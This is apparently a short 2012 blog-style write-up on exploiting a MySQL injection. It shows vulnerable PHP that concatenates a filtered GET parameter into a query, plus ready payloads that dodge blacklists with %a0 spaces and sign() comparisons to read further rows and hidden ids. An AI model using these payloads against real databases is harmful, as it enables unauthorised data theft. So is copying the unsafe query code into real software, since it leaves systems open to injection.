Untitled

/* ***************************************************************************************
* mySQL Injection - getting records from a Db without using "<", ">" or "limit"          *
* @Author : Twitter.com/PaulDS_FR                                                        *
**************************************************************************************** */

So yesterday i was working on a complicated to exploit SQL Injection... Basically the code was (i guess) something like this :

$blacklist = array('"',"'",' ', ','); //simplified, had a lot more in there !
$id = htmlentities(str_replace($blacklist, '', $_GET['id']));
$res = $dbh->query('select * from table where id= ' . $id)->fetch();
echo $res->id . $res->text;

So the first record is easy to get (classic SQL injection i'll not cover) but how do go on and get the next(s) row(s) knowing you cannot play with limit (requires a coma) nor with the "less than" (<) or "more than" (>) operators as they are converted into html entities (who does that by the way !) ?

Well i figured this trick out :

?id=-1 union %a0 select %a0 column1,column2 %a0 from %a0 table %a0 where %a0 sign(id-1)!=-1
?id=-1 union %a0 select %a0 column1,column2 %a0 from %a0 table %a0 where %a0 sign(id-2)!=-1
...

Without the %a0 to insert nbsp (evade the blacklisting of spaces) :

?id=-1 union select column1,column2 from table where sign(id-prev_id)!=-1

Important part is  : where sign(id-prev_id)!=-1

It also worked (as was my case) to get other records from the same table without knowing their ids. I had 3 rows printed (ids 1,2,3) out of a count of 4 rows in the table... Where are you little id ?

?id=sign(id-4)!=-1
?id=sign(id)=-1

The id I was searching for was 1337 (of course :))

Ref :
http://dev.mysql.com/doc/refman/5.0/en/mathematical-functions.html#function_sign

Paul da Silva - 07/11/2012 - Pardon my english, I'm french ;)